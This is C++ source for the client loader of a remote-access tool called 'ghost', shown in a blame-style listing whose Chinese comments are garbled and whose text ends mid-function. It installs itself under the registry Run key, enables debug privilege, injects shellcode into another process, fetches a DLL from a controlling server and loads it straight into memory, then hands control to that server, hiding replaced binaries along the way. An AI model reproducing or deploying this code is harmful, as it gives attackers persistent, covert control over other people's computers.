2025-04-21 02:39:00 +08:00
|
|
|
|
|
2025-01-15 18:49:15 +08:00
|
|
|
|
#include "StdAfx.h"
|
2025-04-21 02:39:00 +08:00
|
|
|
|
#include "MemoryModule.h"
|
2025-04-24 03:01:40 +08:00
|
|
|
|
#include "ShellcodeInj.h"
|
2025-04-21 02:39:00 +08:00
|
|
|
|
#include <WS2tcpip.h>
|
2025-05-09 02:17:14 +08:00
|
|
|
|
#include <common/commands.h>
|
2025-05-29 23:13:46 +08:00
|
|
|
|
#include "common/dllRunner.h"
|
2025-04-21 02:39:00 +08:00
|
|
|
|
#pragma comment(lib, "ws2_32.lib")
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2024-12-28 04:34:54 +08:00
|
|
|
|
// <20>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
|
|
|
|
|
|
#define REG_NAME "a_ghost"
|
|
|
|
|
|
|
2019-01-05 20:21:43 +08:00
|
|
|
|
typedef void (*StopRun)();
|
|
|
|
|
|
|
|
|
|
|
|
typedef bool (*IsStoped)();
|
|
|
|
|
|
|
2024-12-28 18:35:34 +08:00
|
|
|
|
typedef BOOL (*IsExit)();
|
|
|
|
|
|
|
2019-01-05 20:21:43 +08:00
|
|
|
|
// ֹͣ<CDA3><D6B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
StopRun stop = NULL;
|
|
|
|
|
|
|
|
|
|
|
|
// <20>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>ֹͣ
|
|
|
|
|
|
IsStoped bStop = NULL;
|
|
|
|
|
|
|
2019-04-15 16:24:32 +08:00
|
|
|
|
// <20>Ƿ<EFBFBD><C7B7>˳<EFBFBD><CBB3><EFBFBD><EFBFBD>ض<EFBFBD>
|
2024-12-28 18:35:34 +08:00
|
|
|
|
IsExit bExit = NULL;
|
2019-04-15 16:24:32 +08:00
|
|
|
|
|
|
|
|
|
|
BOOL status = 0;
|
|
|
|
|
|
|
2025-05-09 02:17:14 +08:00
|
|
|
|
HANDLE hEvent = NULL;
|
|
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
CONNECT_ADDRESS g_ConnectAddress = { FLAG_FINDEN, "127.0.0.1", "6543", CLIENT_TYPE_DLL, false, DLL_VERSION, 0, Startup_InjSC };
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2019-04-20 11:01:09 +08:00
|
|
|
|
//<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
|
|
|
|
|
|
void DebugPrivilege()
|
|
|
|
|
|
{
|
|
|
|
|
|
HANDLE hToken = NULL;
|
|
|
|
|
|
//<2F><EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
int hRet = OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
|
|
|
|
|
|
|
|
|
|
|
|
if( hRet)
|
|
|
|
|
|
{
|
|
|
|
|
|
TOKEN_PRIVILEGES tp;
|
|
|
|
|
|
tp.PrivilegeCount = 1;
|
|
|
|
|
|
//ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD><EFBFBD>LUID
|
|
|
|
|
|
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
|
|
|
|
|
|
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ȩ<EFBFBD><C8A8>
|
|
|
|
|
|
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
|
|
|
|
|
|
|
|
|
|
|
|
CloseHandle(hToken);
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2019-03-25 22:25:14 +08:00
|
|
|
|
/**
|
|
|
|
|
|
* @brief <EFBFBD><EFBFBD><EFBFBD>ñ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @param[in] *sPath ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>
|
|
|
|
|
|
* @param[in] *sNmae ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @return <EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @details Win7 64λ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><EFBFBD>Խ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
|
|
|
|
|
|
* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
|
|
* @note <EFBFBD>״<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
*/
|
|
|
|
|
|
BOOL SetSelfStart(const char *sPath, const char *sNmae)
|
2019-01-05 20:21:43 +08:00
|
|
|
|
{
|
2019-04-20 11:01:09 +08:00
|
|
|
|
DebugPrivilege();
|
|
|
|
|
|
|
2019-03-25 22:25:14 +08:00
|
|
|
|
// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
|
|
|
|
|
#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
|
|
|
|
|
|
|
|
|
|
|
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
|
|
|
|
|
HKEY hKey = NULL;
|
|
|
|
|
|
LONG lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
|
|
|
|
|
|
|
|
|
|
|
|
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
|
|
|
|
|
if(lRet != ERROR_SUCCESS)
|
|
|
|
|
|
return FALSE;
|
|
|
|
|
|
|
|
|
|
|
|
lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
|
|
|
|
|
|
|
|
|
|
|
|
// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
|
|
|
|
|
|
RegCloseKey(hKey);
|
|
|
|
|
|
|
|
|
|
|
|
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
|
|
|
|
|
return lRet == ERROR_SUCCESS;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2019-04-15 16:24:32 +08:00
|
|
|
|
BOOL CALLBACK callback(DWORD CtrlType)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (CtrlType == CTRL_CLOSE_EVENT)
|
|
|
|
|
|
{
|
|
|
|
|
|
status = 1;
|
2025-05-09 02:17:14 +08:00
|
|
|
|
if (hEvent) SetEvent(hEvent);
|
2019-04-15 16:24:32 +08:00
|
|
|
|
if(stop) stop();
|
|
|
|
|
|
while(1==status)
|
|
|
|
|
|
Sleep(20);
|
|
|
|
|
|
}
|
|
|
|
|
|
return TRUE;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2024-12-28 18:35:34 +08:00
|
|
|
|
// <20><><EFBFBD>г<EFBFBD><D0B3><EFBFBD>.
|
|
|
|
|
|
BOOL Run(const char* argv1, int argv2);
|
|
|
|
|
|
|
2025-04-21 02:39:00 +08:00
|
|
|
|
// Package header.
|
|
|
|
|
|
typedef struct PkgHeader {
|
|
|
|
|
|
char flag[8];
|
|
|
|
|
|
int totalLen;
|
|
|
|
|
|
int originLen;
|
|
|
|
|
|
PkgHeader(int size) {
|
|
|
|
|
|
memset(flag, 0, sizeof(flag));
|
|
|
|
|
|
strcpy_s(flag, "Hello?");
|
|
|
|
|
|
originLen = size;
|
|
|
|
|
|
totalLen = sizeof(PkgHeader) + size;
|
|
|
|
|
|
}
|
|
|
|
|
|
}PkgHeader;
|
|
|
|
|
|
|
|
|
|
|
|
// Memory DLL runner.
|
|
|
|
|
|
class MemoryDllRunner : public DllRunner {
|
2025-04-24 03:01:40 +08:00
|
|
|
|
protected:
|
2025-04-21 02:39:00 +08:00
|
|
|
|
HMEMORYMODULE m_mod;
|
|
|
|
|
|
std::string GetIPAddress(const char* hostName)
|
|
|
|
|
|
{
|
|
|
|
|
|
// 1. <20>ж<EFBFBD><D0B6>Dz<EFBFBD><C7B2>ǺϷ<C7BA><CFB7><EFBFBD> IPv4 <20><>ַ
|
|
|
|
|
|
sockaddr_in sa;
|
|
|
|
|
|
if (inet_pton(AF_INET, hostName, &(sa.sin_addr)) == 1) {
|
|
|
|
|
|
// <20>ǺϷ<C7BA> IPv4 <20><>ַ<EFBFBD><D6B7>ֱ<EFBFBD>ӷ<EFBFBD><D3B7><EFBFBD>
|
|
|
|
|
|
return std::string(hostName);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
// 2. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
addrinfo hints = {}, * res = nullptr;
|
|
|
|
|
|
hints.ai_family = AF_INET; // ֻ֧<D6BB><D6A7> IPv4
|
|
|
|
|
|
hints.ai_socktype = SOCK_STREAM;
|
|
|
|
|
|
hints.ai_protocol = IPPROTO_TCP;
|
|
|
|
|
|
|
|
|
|
|
|
if (getaddrinfo(hostName, nullptr, &hints, &res) != 0)
|
|
|
|
|
|
return "";
|
|
|
|
|
|
|
|
|
|
|
|
char ipStr[INET_ADDRSTRLEN] = {};
|
|
|
|
|
|
sockaddr_in* ipv4 = (sockaddr_in*)res->ai_addr;
|
|
|
|
|
|
inet_ntop(AF_INET, &(ipv4->sin_addr), ipStr, INET_ADDRSTRLEN);
|
|
|
|
|
|
|
|
|
|
|
|
freeaddrinfo(res);
|
|
|
|
|
|
return std::string(ipStr);
|
|
|
|
|
|
}
|
|
|
|
|
|
public:
|
|
|
|
|
|
MemoryDllRunner() : m_mod(nullptr){}
|
2025-04-24 03:01:40 +08:00
|
|
|
|
virtual const char* ReceiveDll(int &size) {
|
2025-04-21 02:39:00 +08:00
|
|
|
|
WSADATA wsaData = {};
|
|
|
|
|
|
if (WSAStartup(MAKEWORD(2, 2), &wsaData))
|
|
|
|
|
|
return nullptr;
|
|
|
|
|
|
|
|
|
|
|
|
const int bufSize = 4 * 1024 * 1024;
|
|
|
|
|
|
char* buffer = new char[bufSize];
|
|
|
|
|
|
bool isFirstConnect = true;
|
|
|
|
|
|
|
2025-04-24 03:01:40 +08:00
|
|
|
|
do {
|
2025-04-21 02:39:00 +08:00
|
|
|
|
if (!isFirstConnect)
|
|
|
|
|
|
Sleep(5000);
|
|
|
|
|
|
|
|
|
|
|
|
isFirstConnect = false;
|
|
|
|
|
|
SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
|
|
|
|
if (clientSocket == INVALID_SOCKET) {
|
|
|
|
|
|
continue;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
DWORD timeout = 5000;
|
|
|
|
|
|
setsockopt(clientSocket, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout, sizeof(timeout));
|
|
|
|
|
|
|
|
|
|
|
|
sockaddr_in serverAddr = {};
|
|
|
|
|
|
serverAddr.sin_family = AF_INET;
|
|
|
|
|
|
serverAddr.sin_port = htons(g_ConnectAddress.ServerPort());
|
|
|
|
|
|
std::string ip = GetIPAddress(g_ConnectAddress.ServerIP());
|
|
|
|
|
|
serverAddr.sin_addr.s_addr = inet_addr(ip.c_str());
|
|
|
|
|
|
if (connect(clientSocket, (SOCKADDR*)&serverAddr, sizeof(serverAddr)) == SOCKET_ERROR) {
|
|
|
|
|
|
closesocket(clientSocket);
|
|
|
|
|
|
continue;
|
|
|
|
|
|
}
|
|
|
|
|
|
#ifdef _DEBUG
|
|
|
|
|
|
char command[4] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 0 };
|
|
|
|
|
|
#else
|
|
|
|
|
|
char command[4] = { SOCKET_DLLLOADER, sizeof(void*) == 8, MEMORYDLL, 1 };
|
|
|
|
|
|
#endif
|
|
|
|
|
|
char req[sizeof(PkgHeader) + 4] = {};
|
|
|
|
|
|
memcpy(req, &PkgHeader(4), sizeof(PkgHeader));
|
|
|
|
|
|
memcpy(req + sizeof(PkgHeader), command, sizeof(command));
|
|
|
|
|
|
auto bytesSent = send(clientSocket, req, sizeof(req), 0);
|
|
|
|
|
|
if (bytesSent != sizeof(req)) {
|
|
|
|
|
|
closesocket(clientSocket);
|
|
|
|
|
|
continue;
|
|
|
|
|
|
}
|
2025-04-24 03:01:40 +08:00
|
|
|
|
char* ptr = buffer + sizeof(PkgHeader);
|
2025-04-21 02:39:00 +08:00
|
|
|
|
int bufferSize = 16 * 1024, bytesReceived = 0, totalReceived = 0;
|
|
|
|
|
|
while (totalReceived < bufSize) {
|
|
|
|
|
|
int bytesToReceive = min(bufferSize, bufSize - totalReceived);
|
|
|
|
|
|
int bytesReceived = recv(clientSocket, buffer + totalReceived, bytesToReceive, 0);
|
|
|
|
|
|
if (bytesReceived <= 0) break;
|
|
|
|
|
|
totalReceived += bytesReceived;
|
|
|
|
|
|
}
|
|
|
|
|
|
if (totalReceived < sizeof(PkgHeader) + 6) {
|
|
|
|
|
|
closesocket(clientSocket);
|
|
|
|
|
|
continue;
|
|
|
|
|
|
}
|
|
|
|
|
|
BYTE cmd = ptr[0], type = ptr[1];
|
2025-04-24 03:01:40 +08:00
|
|
|
|
size = 0;
|
2025-04-21 02:39:00 +08:00
|
|
|
|
memcpy(&size, ptr + 2, sizeof(int));
|
|
|
|
|
|
if (totalReceived != size + 6 + sizeof(PkgHeader)) {
|
|
|
|
|
|
continue;
|
|
|
|
|
|
}
|
|
|
|
|
|
closesocket(clientSocket);
|
|
|
|
|
|
} while (false);
|
|
|
|
|
|
|
|
|
|
|
|
WSACleanup();
|
2025-04-24 03:01:40 +08:00
|
|
|
|
return buffer;
|
|
|
|
|
|
}
|
|
|
|
|
|
// Request DLL from the master.
|
2025-05-29 23:13:46 +08:00
|
|
|
|
virtual void* LoadLibraryA(const char* path, int len=0) {
|
2025-04-24 03:01:40 +08:00
|
|
|
|
int size = 0;
|
|
|
|
|
|
auto buffer = ReceiveDll(size);
|
|
|
|
|
|
if (nullptr == buffer)
|
|
|
|
|
|
return nullptr;
|
2025-05-29 02:52:28 +08:00
|
|
|
|
int pos = MemoryFind(buffer, FLAG_FINDEN, size, sizeof(FLAG_FINDEN) - 1);
|
|
|
|
|
|
if (-1 != pos) {
|
|
|
|
|
|
CONNECT_ADDRESS* addr = (CONNECT_ADDRESS*)(buffer + pos);
|
|
|
|
|
|
BYTE type = buffer[sizeof(PkgHeader) + 1];
|
|
|
|
|
|
addr->iType = type == MEMORYDLL ? CLIENT_TYPE_MEMDLL : CLIENT_TYPE_SHELLCODE;
|
|
|
|
|
|
memset(addr->szFlag, 0, sizeof(addr->szFlag));
|
|
|
|
|
|
strcpy(addr->szServerIP, g_ConnectAddress.ServerIP());
|
|
|
|
|
|
sprintf_s(addr->szPort, "%d", g_ConnectAddress.ServerPort());
|
|
|
|
|
|
}
|
2025-04-24 03:01:40 +08:00
|
|
|
|
m_mod = ::MemoryLoadLibrary(buffer + 6 + sizeof(PkgHeader), size);
|
|
|
|
|
|
SAFE_DELETE_ARRAY(buffer);
|
2025-04-21 02:39:00 +08:00
|
|
|
|
return m_mod;
|
|
|
|
|
|
}
|
|
|
|
|
|
virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) {
|
|
|
|
|
|
return ::MemoryGetProcAddress((HMEMORYMODULE)mod, lpProcName);
|
|
|
|
|
|
}
|
|
|
|
|
|
virtual BOOL FreeLibrary(void* mod) {
|
|
|
|
|
|
::MemoryFreeLibrary((HMEMORYMODULE)mod);
|
|
|
|
|
|
return TRUE;
|
|
|
|
|
|
}
|
|
|
|
|
|
};
|
|
|
|
|
|
|
2021-03-14 17:52:13 +08:00
|
|
|
|
// @brief <20><><EFBFBD>ȶ<EFBFBD>ȡsettings.ini<6E><69><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ȡIP<49>Ͷ˿<CDB6>.
|
|
|
|
|
|
// [settings]
|
|
|
|
|
|
// localIp=XXX
|
|
|
|
|
|
// ghost=6688
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھʹ<DABE><CDB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD>ȡIP<49>Ͷ˿<CDB6>.
|
2019-03-25 22:25:14 +08:00
|
|
|
|
int main(int argc, const char *argv[])
|
|
|
|
|
|
{
|
2024-12-28 04:34:54 +08:00
|
|
|
|
if(!SetSelfStart(argv[0], REG_NAME))
|
2019-03-25 22:25:14 +08:00
|
|
|
|
{
|
2025-04-27 01:16:16 +08:00
|
|
|
|
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
|
2019-03-25 22:25:14 +08:00
|
|
|
|
}
|
2019-04-15 16:24:32 +08:00
|
|
|
|
status = 0;
|
|
|
|
|
|
SetConsoleCtrlHandler(&callback, TRUE);
|
2025-04-24 03:01:40 +08:00
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
// <20><> Shell code <20><><EFBFBD>ӱ<EFBFBD><D3B1><EFBFBD>6543<34>˿ڣ<CBBF>ע<EFBFBD>뵽<EFBFBD><EBB5BD><EFBFBD>±<EFBFBD>
|
|
|
|
|
|
if (g_ConnectAddress.iStartup == Startup_InjSC)
|
|
|
|
|
|
{
|
|
|
|
|
|
// Try to inject shell code to `notepad.exe`
|
|
|
|
|
|
// If failed then run memory DLL
|
|
|
|
|
|
ShellcodeInj inj;
|
|
|
|
|
|
int pid = 0;
|
2025-05-09 02:17:14 +08:00
|
|
|
|
hEvent = ::CreateEventA(NULL, TRUE, FALSE, NULL);
|
2025-04-28 16:08:16 +08:00
|
|
|
|
do {
|
|
|
|
|
|
if (sizeof(void*) == 4) // Shell code is 64bit
|
|
|
|
|
|
break;
|
|
|
|
|
|
if (!(pid = inj.InjectProcess(nullptr))) {
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
2025-05-09 02:17:14 +08:00
|
|
|
|
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);
|
2025-04-28 16:08:16 +08:00
|
|
|
|
if (hProcess == NULL) {
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
|
|
|
|
|
Mprintf("Inject process [%d] succeed.\n", pid);
|
2025-05-09 02:17:14 +08:00
|
|
|
|
HANDLE handles[2] = { hProcess, hEvent };
|
|
|
|
|
|
DWORD waitResult = WaitForMultipleObjects(2, handles, FALSE, INFINITE);
|
|
|
|
|
|
if (status == 1) {
|
|
|
|
|
|
TerminateProcess(hProcess, -1);
|
|
|
|
|
|
CloseHandle(hEvent);
|
|
|
|
|
|
}
|
2025-04-28 16:08:16 +08:00
|
|
|
|
CloseHandle(hProcess);
|
|
|
|
|
|
Mprintf("Process [%d] is finished.\n", pid);
|
2025-05-09 02:17:14 +08:00
|
|
|
|
if (status == 1)
|
|
|
|
|
|
return -1;
|
2025-04-28 16:08:16 +08:00
|
|
|
|
} while (pid);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
if (g_ConnectAddress.iStartup == Startup_InjSC) {
|
|
|
|
|
|
g_ConnectAddress.iStartup = Startup_MEMDLL;
|
|
|
|
|
|
}
|
2024-12-28 18:35:34 +08:00
|
|
|
|
|
|
|
|
|
|
do {
|
2024-12-29 01:09:06 +08:00
|
|
|
|
BOOL ret = Run(argc > 1 ? argv[1] : (strlen(g_ConnectAddress.ServerIP()) == 0 ? "127.0.0.1" : g_ConnectAddress.ServerIP()),
|
|
|
|
|
|
argc > 2 ? atoi(argv[2]) : (g_ConnectAddress.ServerPort() == 0 ? 6543 : g_ConnectAddress.ServerPort()));
|
2024-12-28 18:35:34 +08:00
|
|
|
|
if (ret == 1) {
|
|
|
|
|
|
return -1;
|
|
|
|
|
|
}
|
|
|
|
|
|
} while (status == 0);
|
|
|
|
|
|
|
|
|
|
|
|
status = 0;
|
|
|
|
|
|
return -1;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>в<EFBFBD><D0B2><EFBFBD>: IP <20><> <20>˿<EFBFBD>.
|
|
|
|
|
|
BOOL Run(const char* argv1, int argv2) {
|
|
|
|
|
|
BOOL result = FALSE;
|
|
|
|
|
|
char path[_MAX_PATH], * p = path;
|
2019-01-05 20:21:43 +08:00
|
|
|
|
GetModuleFileNameA(NULL, path, sizeof(path));
|
|
|
|
|
|
while (*p) ++p;
|
|
|
|
|
|
while ('\\' != *p) --p;
|
2024-12-28 18:35:34 +08:00
|
|
|
|
*(p + 1) = 0;
|
|
|
|
|
|
std::string folder = path;
|
|
|
|
|
|
std::string oldFile = folder + "ServerDll.old";
|
|
|
|
|
|
std::string newFile = folder + "ServerDll.new";
|
|
|
|
|
|
strcpy(p + 1, "ServerDll.dll");
|
|
|
|
|
|
BOOL ok = TRUE;
|
|
|
|
|
|
if (_access(newFile.c_str(), 0) != -1) {
|
|
|
|
|
|
if (_access(oldFile.c_str(), 0) != -1)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (!DeleteFileA(oldFile.c_str()))
|
|
|
|
|
|
{
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Error deleting file. Error code: %d\n", GetLastError());
|
2024-12-28 18:35:34 +08:00
|
|
|
|
ok = FALSE;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
if (ok && !MoveFileA(path, oldFile.c_str())) {
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Error removing file. Error code: %d\n", GetLastError());
|
2024-12-28 18:35:34 +08:00
|
|
|
|
ok = FALSE;
|
|
|
|
|
|
}else {
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA><EFBFBD><EFBFBD>
|
|
|
|
|
|
if (SetFileAttributesA(oldFile.c_str(), FILE_ATTRIBUTE_HIDDEN))
|
|
|
|
|
|
{
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("File created and set to hidden: %s\n",oldFile.c_str());
|
2024-12-28 18:35:34 +08:00
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
if (ok && !MoveFileA(newFile.c_str(), path)) {
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Error removing file. Error code: %d\n", GetLastError());
|
2024-12-28 18:35:34 +08:00
|
|
|
|
MoveFileA(oldFile.c_str(), path);// recover
|
|
|
|
|
|
}else if (ok){
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Using new file: %s\n", newFile.c_str());
|
2024-12-28 18:35:34 +08:00
|
|
|
|
}
|
|
|
|
|
|
}
|
2025-04-28 16:08:16 +08:00
|
|
|
|
DllRunner* runner = nullptr;
|
|
|
|
|
|
switch (g_ConnectAddress.iStartup)
|
|
|
|
|
|
{
|
|
|
|
|
|
case Startup_DLL:
|
|
|
|
|
|
runner = new DefaultDllRunner;
|
|
|
|
|
|
break;
|
|
|
|
|
|
case Startup_MEMDLL:
|
|
|
|
|
|
runner = new MemoryDllRunner;
|
|
|
|
|
|
break;
|
|
|
|
|
|
default:
|
|
|
|
|
|
ExitProcess(-1);
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2025-04-21 02:39:00 +08:00
|
|
|
|
void* hDll = runner->LoadLibraryA(path);
|
2024-12-28 18:35:34 +08:00
|
|
|
|
typedef void (*TestRun)(char* strHost, int nPort);
|
2025-04-21 02:39:00 +08:00
|
|
|
|
TestRun run = hDll ? TestRun(runner->GetProcAddress(hDll, "TestRun")) : NULL;
|
|
|
|
|
|
stop = hDll ? StopRun(runner->GetProcAddress(hDll, "StopRun")) : NULL;
|
|
|
|
|
|
bStop = hDll ? IsStoped(runner->GetProcAddress(hDll, "IsStoped")) : NULL;
|
|
|
|
|
|
bExit = hDll ? IsExit(runner->GetProcAddress(hDll, "IsExit")) : NULL;
|
2025-02-07 19:23:15 +08:00
|
|
|
|
if (NULL == run) {
|
2025-04-21 02:39:00 +08:00
|
|
|
|
if (hDll) runner->FreeLibrary(hDll);
|
2025-02-07 19:23:15 +08:00
|
|
|
|
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ض<EFBFBD>̬<EFBFBD><EFBFBD><EFBFBD>ӿ<EFBFBD>\"ServerDll.dll\"ʧ<EFBFBD><EFBFBD>. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
|
|
|
|
|
|
Sleep(3000);
|
2025-04-21 02:39:00 +08:00
|
|
|
|
delete runner;
|
2025-02-07 19:23:15 +08:00
|
|
|
|
return FALSE;
|
|
|
|
|
|
}
|
|
|
|
|
|
do
|
2019-01-05 20:21:43 +08:00
|
|
|
|
{
|
2024-12-29 01:09:06 +08:00
|
|
|
|
char ip[_MAX_PATH];
|
|
|
|
|
|
strcpy_s(ip, g_ConnectAddress.ServerIP());
|
|
|
|
|
|
int port = g_ConnectAddress.ServerPort();
|
2024-12-27 01:40:40 +08:00
|
|
|
|
strcpy(p + 1, "settings.ini");
|
|
|
|
|
|
if (_access(path, 0) == -1) { // <20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: <20><><EFBFBD>ȴӲ<C8B4><D3B2><EFBFBD><EFBFBD><EFBFBD>ȡֵ<C8A1><D6B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ǵ<EFBFBD>g_ConnectAddressȡֵ.
|
2024-12-28 18:35:34 +08:00
|
|
|
|
strcpy(ip, argv1);
|
|
|
|
|
|
port = argv2;
|
|
|
|
|
|
}
|
|
|
|
|
|
else {
|
2024-12-29 01:09:06 +08:00
|
|
|
|
GetPrivateProfileStringA("settings", "localIp", g_ConnectAddress.ServerIP(), ip, _MAX_PATH, path);
|
|
|
|
|
|
port = GetPrivateProfileIntA("settings", "ghost", g_ConnectAddress.ServerPort(), path);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("[server] %s:%d\n", ip, port);
|
2024-12-28 18:35:34 +08:00
|
|
|
|
do
|
2019-04-15 16:24:32 +08:00
|
|
|
|
{
|
|
|
|
|
|
run(ip, port);
|
2024-12-28 18:35:34 +08:00
|
|
|
|
while (bStop && !bStop() && 0 == status)
|
2019-04-15 16:24:32 +08:00
|
|
|
|
Sleep(20);
|
|
|
|
|
|
} while (bExit && !bExit() && 0 == status);
|
2019-04-20 11:01:09 +08:00
|
|
|
|
|
2024-12-28 18:35:34 +08:00
|
|
|
|
while (bStop && !bStop() && 1 == status)
|
2019-04-20 11:01:09 +08:00
|
|
|
|
Sleep(20);
|
2024-12-28 18:35:34 +08:00
|
|
|
|
if (bExit) {
|
|
|
|
|
|
result = bExit();
|
|
|
|
|
|
}
|
2025-02-07 19:23:15 +08:00
|
|
|
|
} while (result == 2);
|
2025-04-21 02:39:00 +08:00
|
|
|
|
if (!runner->FreeLibrary(hDll)) {
|
2025-02-07 19:23:15 +08:00
|
|
|
|
